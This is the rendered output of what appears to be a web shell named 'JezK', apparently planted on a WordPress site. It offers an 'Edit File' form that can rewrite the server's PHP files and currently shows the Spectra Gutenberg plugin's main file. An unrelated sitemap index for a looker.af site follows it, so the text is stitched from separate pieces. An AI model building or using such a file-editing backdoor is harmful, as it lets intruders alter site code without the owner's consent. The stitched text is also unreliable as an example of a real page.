
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: ultimate-addons-for-gutenberg.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Plugin Name: Spectra
 * Plugin URI: https://www.brainstormforce.com
 * Author: Brainstorm Force
 * Author URI: https://www.brainstormforce.com
 * Version: 2.18.1
 * Description: The Spectra extends the Gutenberg functionality with several unique and feature-rich blocks that help build websites faster.
 * Text Domain: ultimate-addons-for-gutenberg
 * Domain Path: /languages
 *
 * @package UAGB
 */

define( &#039;UAGB_FILE&#039;, __FILE__ );
define( &#039;UAGB_ROOT&#039;, dirname( plugin_basename( UAGB_FILE ) ) );
define( &#039;UAGB_PLUGIN_NAME&#039;, &#039;Spectra&#039; );
define( &#039;UAGB_PLUGIN_SHORT_NAME&#039;, &#039;Spectra&#039; );
define( &#039;SPECTRA_PRO_PLUGIN_URL&#039;, &#039;https://wpspectra.com/pro&#039; );

if ( ! version_compare( PHP_VERSION, &#039;5.6&#039;, &#039;&gt;=&#039; ) ) {
	add_action( &#039;admin_notices&#039;, &#039;uagb_fail_php_version&#039; );
} elseif ( ! version_compare( get_bloginfo( &#039;version&#039; ), &#039;4.7&#039;, &#039;&gt;=&#039; ) ) {
	add_action( &#039;admin_notices&#039;, &#039;uagb_fail_wp_version&#039; );
} else {
	require_once &#039;classes/class-uagb-loader.php&#039;;
}

/**
 * Ultimate Addons for Gutenberg admin notice for minimum PHP version.
 *
 * Warning when the site doesn&#039;t have the minimum required PHP version.
 *
 * @since 1.8.1
 *
 * @return void
 */
function uagb_fail_php_version() {
	/* translators: %s: PHP version */
	$message      = sprintf( esc_html__( &#039;Spectra requires PHP version %s+, plugin is currently NOT RUNNING.&#039;, &#039;ultimate-addons-for-gutenberg&#039; ), &#039;5.6&#039; );
	$html_message = sprintf( &#039;&lt;div class=&quot;error&quot;&gt;%s&lt;/div&gt;&#039;, wpautop( $message ) );
	echo wp_kses_post( $html_message );
}


/**
 * Ultimate Addons for Gutenberg admin notice for minimum WordPress version.
 *
 * Warning when the site doesn&#039;t have the minimum required WordPress version.
 *
 * @since 1.8.1
 *
 * @return void
 */
function uagb_fail_wp_version() {
	/* translators: %s: WordPress version */
	$message      = sprintf( esc_html__( &#039;Spectra requires WordPress version %s+. Because you are using an earlier version, the plugin is currently NOT RUNNING.&#039;, &#039;ultimate-addons-for-gutenberg&#039; ), &#039;4.7&#039; );
	$html_message = sprintf( &#039;&lt;div class=&quot;error&quot;&gt;%s&lt;/div&gt;&#039;, wpautop( $message ) );
	echo wp_kses_post( $html_message );
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
